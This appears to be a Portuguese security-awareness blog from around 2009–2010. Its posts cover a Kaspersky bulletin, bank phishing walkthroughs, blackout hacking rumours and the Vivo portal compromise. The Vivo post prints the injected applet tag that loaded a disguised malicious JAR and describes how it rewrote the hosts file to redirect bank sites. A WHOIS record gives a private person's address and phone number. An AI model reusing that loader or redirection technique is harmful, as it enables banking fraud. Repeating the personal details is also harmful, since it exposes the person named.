Blog do Márcio d'Ávila

A equipe de analistas de segurança da empresa russa Kaspersky, fornecedora de um dos mais eficientes e conceituados antivírus do mercado e outros produtos para segurança de computadores e redes, divulgou em 17 de fevereiro deste ano o boletim anual de segurança relativo a 2009.

O Kaspersky Security Bulletin 2009 é dividido em três partes:

1. Malware Evolution 2009, por Eugene Aseev, Alexander Gostev e Denis Maslennikov. Analisa tendências dos últimos anos, análise de 2009 (aumento da sofisticação, epidemias, fraudes, malware para plataformas e dispositivos não usuais), previsões.
2. Statistics, 2009, por Eugene Aseev e Alexander Gostev. As estatísticas abordam programas maliciosos na Internet (ataques via Web), e os Top 20 em 2009 para códigos maliciosos na Internet, países hospedando malware e países atacados.
3. Spam Evolution 2009, por Elena Bondarenko, Darya Gudkova e Maria Namestnikova. Aborda uma visão geral do ano, spam no tráfego de correio, fontes de spam, categorias, fraudes (phishing, scam), tipos e tamanhos, métodos e truques dos spammers, spam nos sites de redes sociais, malware em email, e conclusões.

Os dados e informações, como sempre infelizmente, assustam.

Além do boom de novos malwares observados em 2008 — devido a fatores como rápida evolução da criação de virus na China, evolução das tecnologias de infecção de arquivos, e solidificação de vetores de ataque –, 2009 manteve taxa de surgimento de malware próxima a 2008 e ainda os programas maliciosos se tornaram significativamente mais complexos e sofisticados.

Com a evolução e popularização dos smartphones, observa-se um razoável movimento de surgimento de malware para dispositivos móveis. Embora o número absoluto de novos malwares em 2009 não pareça grande, 257, representa um aumento próximo a 80% em relação a 2008.

China aparece como hospedeiro de mais da metada de todo malware mundial (52,7%), seguida por Estados Unidos (19,02%). Em terceiro e quarto no ranking vem Países Baixos (5,86%) e Alemanha (5,07%). Brasil aparece em décimo-terceiro da lista, responsável por apenas 0,44%.

A China também é o maior alvo de ataques, 46,75% deles. EUA também são segundo como alvo, mas em apenas 6,64% do total. Rússia em terceiro (5,83%), Índia quarto (4,54%), seguidos por Alemanha (2,53%), Reino Unido (2,25%), Arábia Saudita (1,81%) e, em oitavo, Brasil (1,78%).

Softwares populares têm suas vulnerabilidades mais exploradas. Não por acaso, Microsoft (Office, serviços XML), Apple (QuickTime + iTunes), Adobe (Flash Player) e Sun (Java) fecham o ranking das 20 vulnerabilidades mais críticas que responderam por 90% dos arquivos/aplicações vulneráveis no ano.

Considerando a base instalada de programas, os aplicativos mais perigosos de 2009 foram, nessa ordem:

1. Apple QuickTime
2. Microsoft Office
3. Adobe Flash Player

Quantos aos insuportáveis spams, é muito triste constatar que mais de 80% de todo o tráfego de correio eletrônico no mundo é de lixo.

Estados Unidos (16%), Rússia (8,5%) e Brasil (7,6%) são as maiores origens de spam, proliferando a divulgação de medicamentos (“viagra” e afins), diplomas e outros lixos.

No segundo semestre de 2009, quase 10% do spam envolveu mensagens fraudulentas, em phishing e scam. Eu apostaria que especificamente no Brasil, esse percentual deve ser bem maior, pela quantidade enorme de fraudes que vejo circular por aqui.

Exibo neste artigo o passo a passo de uma fraude do tipo phishing scam (pesca-bobos) que chega por e-mail, para alertar a todos de o que é e como pode aparentar um dos muitos tipos de fraude bancária existentes na Internet.

A mensagem de e-mail

Chega por e-mail um spam, enviados a milhões de pessoas, a seguinte mensagem fraudulenta.

Uma parcela dos destinatários será realmente usuário do banco em questão (Bradesco). Destes, alguns serão ingênuos e desprevenidos o bastante para cair na farsa.

A página web

Quem clica no link da mensagem de correio eletrônico, cujo domínio é muito duvidoso (Pense: por que o banco legítimo usaria um desconhecido atendimento-v6.com e não o domínio do próprio banco bradesco.com.br? Indício claro de fraude) é direcionado para uma página web onde o Passo 1 é escolher o tipo de cliente.

A página web exibe inicialmente uma janela de diálogo para tentar “tranquilizar” o cliente otário…

“FIQUE TRANQUILO – Você está operando em um ambiente seguro e criptografado, apartir (sic) de agora somente o seu computador e os nossos servidores centrais entendem as informações digitadas.”

Ambiente seguro??? Não existe ambiente seguro se não há o protocolo HTTPS (observe nesta página de fraude o http comum, sem s, na barra de endereço), quando aparece o famoso cadeado exibido pelo próprio navegador. O cadeado vermelho exibido é uma mera imagem fajuta na página, não significa nada.

Veja a seguir imagens no Firefox (3.6) e Internet Explorer (8) exibindo uma conexão segura real. O endereço começa sempre com https (S de seguro) e o navegador exibe um cadeado. O do Firefox é no canto inferior direito da janela, na barra de estado; o do Internet Explorer 8 passou a ser exibido no final da barra de endereço.

Pessoa física – passo a passo

Os passos para pessoa física, ou clientes Prime e Private são praticamente idênticas. Veja a seguir os passos exibidos quando se escolhe Pessoa Física.

A digitação da conta inclui o requinte de efetivamente validar o dígito verificador. Se digitado incorreto, a janela de diálogo acima é exibida e não se pode prosseguir.

Na tela de digitação da senha de quatro dígitos, uma mensagem ameaçadora incentiva o usuário a continuar:

“Não cancele a atualização do Plugin de Segurança, pois ocorrerá o bloqueio imediato de sua conta por medidas de segurança.”

O script de digitação pelo telcado virtual não funciona no Firefox. No Internet Explorer a digitação funcionou, embora a diagramação da tela é que ficou incorreta, por causa de um número de controle exibido no alto. Veja a seguir.

No Passo 4 seguinte, o auge do indício total de fraude: Todos os 70 códigos do cartão de segurança emitido pelo banco são solicitados, e não apenas um como é a medida de segurança nas transações legítimas. Só o fraudador é que precisa de todos os códigos, para usar um deles que for solicitado pelo banco quando ele for utilizar os dados que está roubando aqui.

Mais uma vez, a validação. Nenhum código pode ser deixado em branco, senão uma mensagem é exibida e a fraude não prossegue.

O toque final, a senha de seis dígitos do cartão magnético. Novamente, a digitação só funciona no IE.

Pronto, fraude completa! Para quem digitou direitinho e pacientemente tudo, agora o fraudador tem todos os dados secretos da sua conta bancária e está apto a fazer qualquer transação eletrônica nesta conta.

Em um requinte de sofisticação, mais uma validação feita na fraude. Ela salva na sessão do navegador que a fraude foi concluída. Se você fizer tentativa de iniciá-la novamente, é exibida a mensagem a seguir, informando que “sua conta já foi cadastrada (isto é, roubada) com sucesso” pelo programa do fraudador.

Pessoa Jurídica

Na opção para pessoa jurídica, o Passo 2, em duas etapas, é ligeiramente diferente.

Conclusão

Banco nenhum faz recadastramento ou validação desta forma, muito menos solicitando todos os seus dados sigilosos!

Este tipo de fraude é por formulário, induzindo o próprio usuário a informar docilmente todos os seus dados em uma página de fraude que será enviada ao ladrão.

Outra técnica de fraude existente, quase sempre iniciada por uma mensagem de spam por e-mail, apresenta algum pretexto impactante/alarmante que o faça clicar em um link, baixar e instalar um programa. Este programa tipicamente é um cavalo-de-tróia (trojan) espião, que fica em execução para tentar capturar em seu computador dados bancários ou outras informações sigilosas, para enviá-las ao fraudador via internet.

Para ver mais exemplos de fraude de todos os tipos e organizadas por temas dos pretextos, veja meu artigo: Phishing Scam – A fraude inunda o correio eletrônico.

Nota: os avisos de página falsa e de classificação ruim exibidos no alto de algumas imagens são exibidos pelo Antiphishing nativo do Firefox e pelo plugin WOT, respectivamente. Para saber mais, consulte o artigo Quem avisa amigo é – Classificação de sites.

As fraudes, às vezes, tem aparência realista. Esta que recebi recentemente manteve texto e formatação verossímeis tanto no e-mail quanto na página web apontada pelo link da mensagem. Além disso, ainda conseguiram registrar um domínio com nome convincente. A fraude usa como tema a promoção Surpreenda MasterCard, e para a fraude registraram o domínio supreendo.com.

Conforme lembrou minha amiga e tuiteira Maria Inês, o domínio fraudulento é perigosamente muito parecido com o legítimo, que é surpreendamc.com.br.

Então, qual indício deve deixar o usuário recebedor desconfiado e alerta, a ponto de reconhecer a fraude e não seguir em frente? O excesso de informações pessoais sigilosas solicitadas. Neste caso: nome completo, CPF, e todos os dados do cartão de crédito (número, validade e código de segurança).

Basta raciocinar o seguinte: só com estes três dados do cartão, alguém consegue hoje em dia fazer qualquer compra on-line ou por telefone. E ainda com seu nome completo e — principalmente — CPF, pode criar um cadastro falso (e válido!) em lojas (físicas e virtuais), financeiras e sabe-se lá onde e para que mais.

De fato, todas vez que lhe solicitarem este tipo de informações pessoais sigilosas, seja em que situação for (inclusive fora da internet, pessoalmente ou em um telefonema), pense e confirme cuidadosamente se você confia, acredita e tem segurança integral em quem está solicitando e para que está solicitando, pois são informações das mais valiosas e sensíveis que uma pessoa pode possuir nos dias atuais.

Minha recomendação permance: na Internet, desconfie e tenha cuidado sempre! Infelizmente, pode existir maldade e más intenções em todo lugar.

Veja as imagens (inócuas, são meras reproduções visuais da fraude, sem os links maliciosos) da mensagem de e-mail e da página web:

Os serviços colaborativos de segurança web no combate à fraude PhishTank e WOT classificaram esta página como fraude, de acordo com a avaliação de vários usuários.

A seguir, dados técnicos e administrativos publicados no registro do domínio. Note que mensagem foi enviada em 16 de fevereiro, e o domínio criado poucos dias antes, dia 10.

WHOIS information for surpreendo.com :

[Querying whois.verisign-grs.com]
[whois.verisign-grs.com]

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: SURPREENDO.COM
   Registrar: UNIVERSO ONLINE LTDA
   Whois Server: whois.host.uol.com.br
   Referral URL: http://registrar.host.uol.com.br
   Name Server: NS1.DOMINIOS.UOL.COM.BR
   Name Server: NS2.DOMINIOS.UOL.COM.BR
   Name Server: NS3.DOMINIOS.UOL.COM.BR
   Status: clientTransferProhibited
   Updated Date: 10-feb-2010
   Creation Date: 10-feb-2010
   Expiration Date: 10-feb-2011

Registrant/Administrative Contact/Technical Contact:
   Name:                GLADYS CRISTINA PERFEITO SAMPAIO
   Organization:        GLADYS CRISTINA PERFEITO SAMPAIO
   E-mail:              surpreend@uol.com.br
   Address:             RUA CAIABU 204 Casa
   Address:             21361230
   Address:             RIO DE JANEIRO - RJ
   Phone:               55 21 33510984
   Country:             BRASIL
   Created:             2010-02-10
   Updated:             2010-02-10

Há pouco mais de um mês, outra fraude usando a marca MasterCard como tema também circulou na internet. A fraude alegava um recadastramento e levava a um site que também foi registrado com um domínio convincente: mastercardbrasil.com.

Até o momento deste artigo, o endereço continuava ativo, embora felizmente os serviços de combate a fraudes já o tem cadastrado, de forma que tanto o recurso de proteção/notificação contra fraudes nativo do Firefox quanto o serviço WOT alertam para o endereço fraudulento.

Veja a seguir as imagens da fraude.

Observe, no texto da mensagem, certo descuido com a redação, indício comum a muitas fraudes. Vários erros de pontuação, acentuação (fráude, indesejaveis, usuarios), uso de maiúscula no meio da frase (… combate Contra qualquer …) etc. Dificilmente uma mensagem legítima, elaborada por profissionais de marketing, deixaria passar esse tipo de descuido, pois isso poderia prejudicar a boa imagem da marca.

No endereço web de destino, observe que são exibidos apenas os alertas sobrepostos do Firefox e do WOT, em lugar da página fraudulenta.

Por fim, apresento a imagem de uma mensagem legítima da promoção “Programa Surpreenda Mastercard”, para que o leitor compare as semelhanças e diferenças com as fraudes anteriormente apresentadas aqui.

Para saber mais:

• Artigo com centenas de exemplos e informações: Phishing Scam – A fraude inunda o correio eletrônico.
• Referências sobre o assunto, em Márcio’s Hyperlink: Segurança – Malware – Fraude.

O programa de TV 60 Minutes da rede americana CBS que foi ao ar em 8 de novembro passado apresentou a reportagem “Guerra Cibernética: Sabotando o Sistema”, em que sugere que apagões no Brasil podem ter sido causados por ataques hacker.

Tudo começou com a seguinte declaração recente do presidente dos EUA Barack Obama, que disse (tradução livre minha):

“Nós sabemos que intrusos cibernéticos sondaram nossa rede elétrica, e em outros países ataques cibernéticos fizeram cidades inteiras mergulhar na escuridão.”

Segundo a CBS, fontes militares dizem que ele se referia ao Brasil, aludindo que ataques de hackers teriam sido causa dos apagões ocorridos no país em 2005 e 2007. O jornalista afirma que os dados foram retirados de uma investigação específica sobre casos de ataques e crimes virtuais contra a infraestrutura de diversos governos. Os ataques seriam semelhantes aos sofridos nos Estados Unidos em 2009. (fonte: INFO Online).

A reportagem da CBS é cheia de sensacionalismo e tem pouco enfoque no embasamento e comprovação técnicos. Mas a notícia vem espalhando temores e sucitando teorias da conspiração, impulsionada pela esteira de sensibilização da população pelo blecaute que atingiu dez estados brasileiros — além do Paraguai – na noite de 10 de novembro.

Teoria da conspiração

Um exemplo do alarde provocado é o artigo A verdade sobre o apagão, por Maycon Maia Vitali, no Blog Hack’n Roll. Nele o rapaz de 23 anos, motivado pelo assunto, fez uma sondagem superficial na internet e encontrou uma vulnerabilidade de segurança em um sistema do Operador Nacional do Sistema Elétrico (ONS) do Brasil.

A falha no site apontada por Vitali foi corrigida na sexta-feira, três dias após o apagão que afetou 18 Estados brasileiros, conforme afirmou o diretor-geral do ONS, Hermes Chipp.

Como bem destaca o blogueiro Jomar Silva, não é porque um sistema de administração de contratos de transmissão da ONS está online que outros sistemas críticos de operação da rede elétrica estarão abertos na internet, nem tampouco supor que a falha simples encontrada pelo rapaz corrobore para comprovar que o sistema de energia elétrica do Brasil em si esteja comprometido e vulnerável a ataque de crackers.

A incursão de Vitali apenas reforça o que todo especialista em segurança da informação diz: não há segurança absoluta, não há sistema 100% seguro.

Autoridades brasileiras da ONS, Aneel (Agência Nacional de Energia Elétrica), Min. Minas e Energia e Presidência já afirmaram categoricamente que os sistemas críticos de operação e controle da rede de energia elétrica do Brasil não estão acessíveis através da Internet e descartam a possibilidade de sabotagem virtual.

Portanto, o post pode ser caracterizado como FUD — acrônimo do inglês Fear, Uncertainty and Doubt, para designar a tática de desinformação que visa desacreditar uma entidade ou fonte, incitando medo, incerteza e dúvida nas pessoas. Mas é um exemplo de como o efeito de histeria se espalha.

Relatórios de tendências

Bem mais concreto é o recente relatório de Tendências na Segurança de Aplicações Web para os dois primeiros trimestres de 2009, divulgado pela empresa Cenzic, especializada em segurança: Web Application Security Trends Report, Q1-Q2 2009, divulgado em 2009-11-09.

Publicado periodicamente desde 2007, o relatório revela que mais de 3,1 mil vulnerabilidades foram identificadas no primeiro semestre deste ano, índice 10% superior ao verificado no segundo semestre de 2008. Desse total, 78% são em aplicativos web. 87% das aplicações analisadas tinham falhas sérias que poderiam expor informações críticas ou confidenciais dos usuários durante transações (fonte: IT Web).

De acordo com a Cenzic, as vulnerabilidades SQL Injection — como a identificada por Maycon Maia Vitali na aplicação web do ONS — e Cross Site Scripting tiveram maior participação nos ataques pela web, com 25% e 17%, respectivamente.

Outro documento, o “Top Cyber Security Risks”, do SANS Institute, publicado em setembro, revela que mais de 60% dos ataques na internet focaram aplicativos web. Isto porque nos últimos anos a quantidade de vulnerabilidades identificadas em aplicações tem sido muito superior àquelas em sistemas operacionais e redes.

Segurança

No mínimo, todo esse assunto é um alerta sobre como as ameças em um mundo tecnológico e conectado vão saindo da ficção científica futurística e galgando a realidade dos dias de hoje.

Mas se há ameaças mil à solta, há também informação, produtos e serviços de sobra para as instituições, governos, empresas e pessoas poderem se instruir, preparar, prevenir, mitigar e reagir às possibilidades e incidências de vulnerabilidades e falhas de segurança em sistemas.

Para se ter uma simples ideia, já existe, há um bom tempo:

• Normas, em especial a família de normas NBR ISO/IEC 27000 sobre gestão e melhores práticas em segurança da informação e gestão de riscos, e a norma (disponível gratuitamente) ISO/IEC 15408 – Common Criteria (CC) de critérios para avaliação de segurança de sistemas de tecnologia da informação (TI).
• Manuais de metodologia para testes e análises de segurança, como o Open Source Security Testing Methodology Manual (OSSTMM), criado por Pete Herzog e provido pelo ISECOM, o Instituto para Segurança e Metodologias Abertas, sem fins lucrativos.
• Cursos, como o brasileiro Hackers Expostos: Técnicas de intrusão em redes corporativas, ministrado por Filipe Balestra na empresa 4Linux.
• Serviços, como os de análise de segurança e testes de invasão oferecidos pela empresa brasileira Módulo Security.
• Informação e ferramentas aos montes, em maior parte disponível de forma pública e aberta na Internet. Um exemplo: Vinte Controles Críticos para Efetiva Cyber Defesa: Consenso de Auditoria e Guidelines, trabalho desenvolvido pela colaboração de diversos experts em segurança, atualizado pelo Center for Strategic and International Studies em 2009-08-10.

O mal existe, mas o bem também. Para dissipar presságios do caos, basta que não apenas os crackers (hackers do mal), mas principalmente as instituições e pessoas de bem se preocupem, envolvam, invistam e ajam seriamente em segurança.

Ontem (dia 8), foi descoberto um incidente de segurança que comprometeu o portal da operadora de telefonia Vivo e pode ter afetado milhares de usuários.

Explorando alguma vulnerabilidade de segurança no portal da Vivo, um atacante conseguiu injetar no portal um código malicioso. Quem acessou a página principal ( http://www.vivo.com.br/portal/home.php ) infectada recebia a solicitação para que fosse instalado um applet (miniaplicativo Java), que era na verdade um código malicioso.

Crédito da imagem: Victor Santos, blog The Hackerbuster.

O arquivo injetado por atacantes no portal da operadora foi “disfarçado” como se fosse uma imagem JPEG, quando na verdade era um pacote executável Java (formato JAR) do applet malicioso, conforme se pode ver pelo trecho de código a seguir:

<applet name=”Vivo Online - IMPORTANTE: (Para executar corretamente o Vivo Online clique em `Run´.)” code=”laa.class” archive=”http://www.vivo.com.br/portal/co/logo_top.jpg” width=”0″ height=”0″><param name=”Vivo Online” value=”"></applet>


A análise de segurança do código descompilado do miniaplicativo malicioso evidencia dois aspectos principais: o objetivo da fraude e a exploração de mais vulnerabilidades — no portal da Vivo e em um portal colaborativo da Universidade de São Paulo – USP ( goos.io.usp.br ).

A vulnerabilidade no portal da Vivo expôs gravemente o site e foi divulgada em muitos blogs e sites na internet. Permitia a qualquer pessoa com algum conhecimento técnico obter dados sensíveis do computador onde o site está hospedado e até executar comandos. A falha ficou válida até a tarde de hoje, quando a página vulnerável foi removida do site.

A fraude

O objetivo da fraude é, como em quase todos os casos brasileiros de phishing scam, roubar dados bancários.

Como se percebe pela análise técnica do código do applet malicioso, seu propósito era comprometer o computador do usuário, de modo que a tentativa de acesso aos sites de alguns bancos brasileiros levasse à réplicas fraudulentas destes. As réplicas solicitam do usuário todos os dados bancários que dão ao criminoso o acesso eletrônico à conta de banco.

O applet malicioso tenta gravar no arquivo \WINDOWS\system32\drivers\etc\host endereços IP falsos dos sites dos bancos Santander, Itaú, Bradesco e Nossa Caixa. O sistema operacional Windows normalmente consulta este arquivo local antes de procurar resolver via serviço Internet DNS o endereço físico (número IP) que leva a um site (nome de domínio) fornecido ou acessado pelo usuário. Os endereços IP fraudulentos levavam a réplicas maliciosas dos sites desses quatro bancos.

Assim, se o usuário acessou o site da Vivo comprometido, executou o applet, utiliza o Windows em seu computador e depois tentou acessar os endereços adulterados de um dos bancos, chegaria a réplicas fraudulentas destes, conforme ilustrações a seguir:

A fraude do Bradesco não estava sendo exibida corretamente quando acessei, por isso não foi reproduzida aqui.

Fraude Nossa Caixa – Passo a passo

Experimentei prosseguir (com dados fictícios, claro!) na fraude da Nossa Caixa, para ver o que ela faz. Basicamente, ela solicita, do incauto usuário, todos os dados de sua conta bancária: agência e conta, senha, assinatura eletrônica e todos os dados do cartão de segurança do banco. Veja o passo a passo.

1) O usuário clica em “Acesse sua conta” (veja imagem acima).

2) A tela seguinte (bemvindo.php) solicita usuário e senha. O site fraudulento não tem “cadeado” do HTTPS.

Para o preenchimento da senha, há inclusive a opção de usar um Teclado Virtual.

3) A título de “checagem de conta para sua segurança”, a próxima tela (checalogin.php) solicita os números da agência e da conta.

4) A próxima tela (CarregaConta.php) exibe uma tela de entrada, saudando o usuário pelo login fornecido. Todas as opções da barra de menu na parte superior levam para a mesma tela seguinte.

5) Escolhendo qualquer das opções do menu superior, chega-se à próxima tela (ChecarConta.php). Agora é solicitada a assinatura eletrônica.

Nesta tela, é inclusive obrigatório o uso do Teclado Virtual.

Se o usuário fornecer uma assinatura com poucos dígitos, o sistema informa que está inválida.

6) Assinatura validada, chega-se à próxima tela (ChecarConta2.php). Agora, o usuário tem que transcrever tudo que aparece no “Nossa Chave de Segurança”.

7) E por fim, o usuário vai ter mais trabalho agora: tem que transcrever todos os dados do seu “Nossa Chave de Segurança”, uma grande tabela de dados na tela ChecarConta3.php.

Depois disso, a última tela tem um nome descarado: salvadados.php. Pronto! Todos os dados do usuário foram salvos na base de dados do ladrão. Essa tela então exibe um texto dando a indicar que as configurações do navegador não estão adequadas. O link existente ao final, “Página Principal”, leva para a tela de entrada do home banking verdadeiro do banco Nossa Caixa.

Aí já é tarde demais, se o usuário digitou seus dados bancários corretos em todas as telas anteriores, eles já estão nas mãos de bandidos.

Fraude Itaú – Passo a passo

A fraude do Itaú é mais simples, solicita apenas agência, conta e senha.

1) Primeiro, o usuário deve digital agência e conta na tela inicial (veja na ilustração no início do artigo).

2) Na tela seguinte (bklcgi.php), é solicitada a senha eletrônica do Itaú Bankline. Tudo sem “cadeado” do HTTPS.

Ao invés do nome da pessoa, é exibida a palavra “Entrar” no botão que abre o teclado virtual (o site real exibiria o nome do correntista).

Ao fornecer a senha uma vez, é exibido um aviso “Senha incorreta, restam agora duas tentativas.”

Solicitada a senha novamente, nova mensagem informa “Sua senha está inválida, favor efetue o login novamente!”

Em seguida, o usuário é conduzido à página real do Itaú Bankline.

Usuários atentos poderão perceber sutis diferenças. Usuários desatentos podem ser levados a informar os dados sigilosos que darão a um criminoso o acesso eletrônico à sua conta bancária!

Comunicado oficial da Vivo

Transcrevo a seguir o Comunicado da operadora Vivo à imprensa sobre o ocorrido, divulgado em seu portal (A Vivo – Comunicados) em 2009-09-09:

Ataque de hackers ao site da Vivo

Um dos servidores de acesso de usuários ao Portal da Vivo na Internet foi vítima de um ataque de hackers nesta terça-feira, dia 08 de setembro. A partir da detecção do ataque, as equipes de segurança da informação da Vivo entraram em ação e solucionaram o problema às 00h50 desta quarta-feira.

A Vivo informa que os usuários que clicaram numa falsa janela de “warning security” para execução de arquivo, é que podem ter tido o seu computador infectado. Portanto, a recomendação da Empresa é que usuários que tenham acessado o portal www.vivo.com.br no período de 16h07 de 08/09/2009 até as 00h50 de 09.09.2009, e que tenham executado o falso arquivo, evitem acessar sites de bancos até que façam uma verificação de segurança em seu computador.

A Vivo informa que os serviços disponíveis no seu portal não foram afetados e continuam disponíveis e seguros aos seus clientes.

Minhas recomendações

Quem acessou o portal da Vivo nos dois últimos dias (8 e 9 de setembro), usa sistema operacional Windows e clicou o botão “Run” na janela de aviso de segurança do portal (ilustração no início do artigo) — que executa o código malicioso — provavelmente está com seu computador comprometido (infectado).

Deve inicialmente evitar acessar sites bancários neste computador, e fazer verificações de segurança no computador, com o auxílio antivírus e outros utilitários de inspeção de segurança atualizados e, se for o caso, ajuda técnica profissional. Em especial, deve-se rastrear a adulteração do arquivo de sistema \WINDOWS\system32\drivers\etc\host, onde o código malicioso adiciona os IPs fraudulentos.

Quem está nessa situação de risco e acessou site do banco deve também entrar em contato — por telefone ou pessoalmente — com o banco e se informar sobre a possibilidade de ter sido vítima de fraude bancária.

Conclusões

Alguns aspectos que se pode concluir dessa fraude:

• Como quase sempre, o grande objetivo do ataque envolve roubar dados bancários. Os usuários devem ter muito cuidado, precauções e uma boa dose de desconfiança ao acessar o banco pela internet ou informar dados bancários — ou outros dados pessoais e sigilosos — em qualquer site que seja.
• A atenção na internet deve ser constante. Principalmente aos detalhes. Um importantíssimo: Nas fraudes bancárias acima, o criminoso não conseguiu fraudar uma conexão segura HTTPS, que faz o navegador exibir o famoso “cadeado”. Quem acessa o site do seu banco deve prestar atenção a cada detalhe. Qualquer diferença sutil que seja (e nestas fraudes existem algumas em relação aos sites verdadeiros) deve ser motivo para o usuário não prosseguir e, de preferência, entrar imediatamente em contato com o seu banco (por telefone ou pessoalmente).
• Enquanto a maioria das fraudes de falsificação de site (phishing scam) na internet tenta se proliferar através de mensagens de spam por correio eletrônico, esta fraude bancária conseguiu explorar uma vulnerabilidade de um reconhecido portal de serviços, no caso o da operadora de telefonia Vivo, fazendo o portal hospedeiro e difusor do código malicioso. Neste caso, o perigo é muito maior, pois quando o site real da Vivo solicita a execução de algum complemento, mesmo o usuário cauteloso (que já deve desconfiar de e-mails suspeitos) tende a confirar no site. Ponto negativo para a Vivo, que ao deixar um grande portal vulnerável por um dia inteiro, pôs em grave ameaça milhões de usuários que confiaram na empresa.
• A Internet é uma maravilha espetacular da informação, dos serviços on-line, do comércio eletrônico. Com certeza. Mas está cada vez mais e mais perigosa!

Para saber mais

Análises técnicas da falha explorada:

• Análise um pouco mais detalhada do problema com a Vivo, por Filipe Balestra, 2009-09-09, em Linux Magazine Online.
• Site da Vivo infectado, por Victor Santos, Diretor de Serviços e Redes da Clavis Segurança da Informação, 2009-09-09, em seu blog “The Hackerbuster”.
• Falhas grotescas no portal da Vivo – Insegurança total, por Rafael Santos, 2009-09-09.

Notícias sobre este incidente de segurança [Atualizado em 2009-09-10]:

• Infectado, site da operadora Vivo ajuda a roubar senhas bancárias, por Diógenes Muniz, editor de Multimídia da Folha Online, 2009-09-09 às h.
• Vírus instalado por hackers em site da Vivo roubava senhas bancárias, da Redação Portal IMPRENSA, 2009-09-09 às 17h08.
• Portal da Vivo é atacado por piratas, por Marlos Mendes, Rio de Janeiro, 2009-09-09 às 20h09, atualizado em 2009-09-10 às 12h11, em O Dia Online, seção Digital&Tal; inclui a íntegra do comunicado da Vivo à imprensa.
• Site da Vivo sofre ataque e deixa usuários infectados, da Redação, 2009-09-09 às 19h52, no portal eBand, seção Jornalismo – Tecnologia.
• Depois de ter site invadido, Vivo diz que canal pode ser usado com segurança, da Redação do IDG Now!, 2009-09-09 às 19h45, atualizada às 19h57, em IDG Now! – Telecom e Redes – Celulares.
• Invasão a site da Vivo pode ter infectado PC de usuário que clicou em arquivo falso, da Redação, 2009-09-10 às 10h30, em W News.
• Site da Vivo é invadido por hackers e usuários podem ter PCs infectados, do Plantão, 2009-09-10 às 11h05, em O Globo Digital – Tecnologia.

Um dos artigos mais populares e citados do meu site, Phishing Scam – A fraude inunda o correio eletrônico é fruto de um trabalho pessoal de coleta de exemplos de fraude ao longo de quase três anos, entre 2004 e 2007.

Resultou na coleta de mais de 360 amostras de fraude, ilustradas (apenas como imagem inofensiva reproduzida da tela), que foram cuidadosamente classificadas e organizadas em categorias.

A amostragem é mais do que suficiente para o efeito didático e informativo desejado de caracterizar e exemplificar os mais diversos temas de fraude a que os usuários de internet estão sujeitos a todo momento.

De 2007 em diante, o artigo tem recebido apenas pequenos retoques de conteúdo, como atualizações de informação e links ou algum novo exemplo de fraude relevante.

Intacto desde a revisão nº 40 em 2 de maio de 2008, o artigo recebeu hoje uma nova seção, com uma coletânea (não exaustiva) de alertas e informações sobre fraude e segurança disponibilizados por empresas e instituições que são usados com frequência como tema em golpes na internet.

O artigo também recebeu um sumário (índice) no início, para facilitar o acesso aos tópicos e ao texto, que já está bem amplo.

Este artigo é voltado para qualquer usuário de internet, sem a necessidade de conhecimentos técnicos. Meu esforço pessoal de anos em sua elaboração e atualização tem sentido unicamente para produzir um instrumento de informação, orientação e referência sobre um dos temas de segurança mais preocupantes para os usuários de internet: as fraudes e golpes por e-mail.

Leiam. Divulguem. Citem. Espero que esse artigo continue útil e ajude a formar conscientização para uma Internet mais segura.

Abraços!

Desde 2004, venho monitorando fraudes que circulam na Internet brasileira.

Desde então, cresce e se multiplica a fraude mais típica no Brasil até agora: Uma mensagem enviada como spam em larga escala, com um assunto fraudulento qualquer que possa convencer e atrair a atenção de parte dos destinatários, para que cliquem em um link que os fará instalar e deixar em execução um programa espião, tipicamente um “roubador” de dados bancários.

Ao longo destes cinco anos coletando e analisando fraudes, eu mantenho o artigo Phishing Scam – A fraude inunda o correio eletrônico, que lista imagens de mais de duzentos exemplos de fraude, organizados por temas.

As fraudes começaram grosseiras. Mas, inevitavelmente como em qualquer área de conhecimento, para o bem ou para o mal, as coisas evoluem. E a fraude evoluiu.

Ontem, recebi a primeira fraude em que vi uma mensagem personalizada, ou seja, onde incluíram o meu nome verdadeiro na mensagem, para aumentar a verossimilhança.

Isso significa que, ao invés do fraudador usar uma base de dados de spam simples de e-mails para enviar a fraude, agora eles estão utilizando uma base de dados de spam com nome e e-mail.

Figura 1: Reprodução da mensagem de fraude recebida.

Indícios

Dos cinco indícios típicos principais que listo para se identificar fraudes, mais um deles foi suplantado: a impessoalidade. Vamos analisar esta mensagem quanto a estes indícios:

• Apresentação descuidada: NEGATIVO.

  Esta mensagem tem um layout HTML razoável e inclusive utiliza uma imagem de cabeçalho extraída do próprio site real da Gol Linhas Aéreas. Não apresenta erros grosseiros de português. O texto não está acentuado, mas algumas mensagens legítimas também não utilizam acentos (por razões de compatibilidade). Só há pequenos descuidos, que eventualmente poderiam existir em uma mensagem legítima — e que dificilmente um usuário leigo ou pouco observador perceberia — como: os dados da suposta passagem exibem hora, mas não data nem número do voo; não houve tratamento adequado para que a imagem bem larga (970 pixels) não gerasse barra de rolagem (scroll) lateral.

• Link destino não confiável: POSITIVO.

  Observe na figura o endereço do link de destino na barra de estado: fotosnovidades.net/d2/GOL_TICKET_Marcio.txt. O domínio Fotosnovidades.net não tem nada a ver com a Gol. Mas isso é um detalhe sutil. Infelizmente, muitos usuários clicam em links sem avaliar antes o endereço destino. E já vi outras fraudes que dissimulam esse indício, usando endereços com nomes mais plausíveis.

• Informação improvável: NEGATIVO.

  O tema, aquisição de passagens de uma das principais empresas aéreas brasileiras, é perfeitamente plausível a milhares de brasileiros que podem ter recebido a fraude. Além do mais, mesmo uma pessoa que nunca viajou de avião pode ser atraído pela mensagem temendo estar sendo vítima de um roubo de identidade e/ou de uso indevido de seus dados na suposta aquisição de passagem aérea.

• Impessoalidade: NEGATIVO.

  A atual evolução. A fraude usou uma base de dados de spam mais “apurada”, que contém não só e-mails, mas os respectivos nomes das pessoas, enviando mensagens pessoais e individualizadas. Assim, a fraude utilizou o meu nome verdadeiro.

• Remetente suspeito: NEGATIVO.

  Esse infelizmente é fácil de fraudar. Assim como em uma carta em papel qualquer um pode escrever o que quiser como remetente, é possível forjar nome e endereço eletrônico do remetente no cabeçalho “De” (From) da mensagem de e-mail. Esta fraude identificou o remetente como "SAC GOL" <noreply@voegol.com.br>, que aparenta ser originado da Gol. Um técnico que inspecione o cabeçalho completo no código-fonte da mensagem pode identificar um servidor SMTP de onde a mensagem partiu suspeito. Mas essa informação é bastante técnica, de difícil compreensão ou análise por um leigo e não é exibida na visualização básica de mensagens.

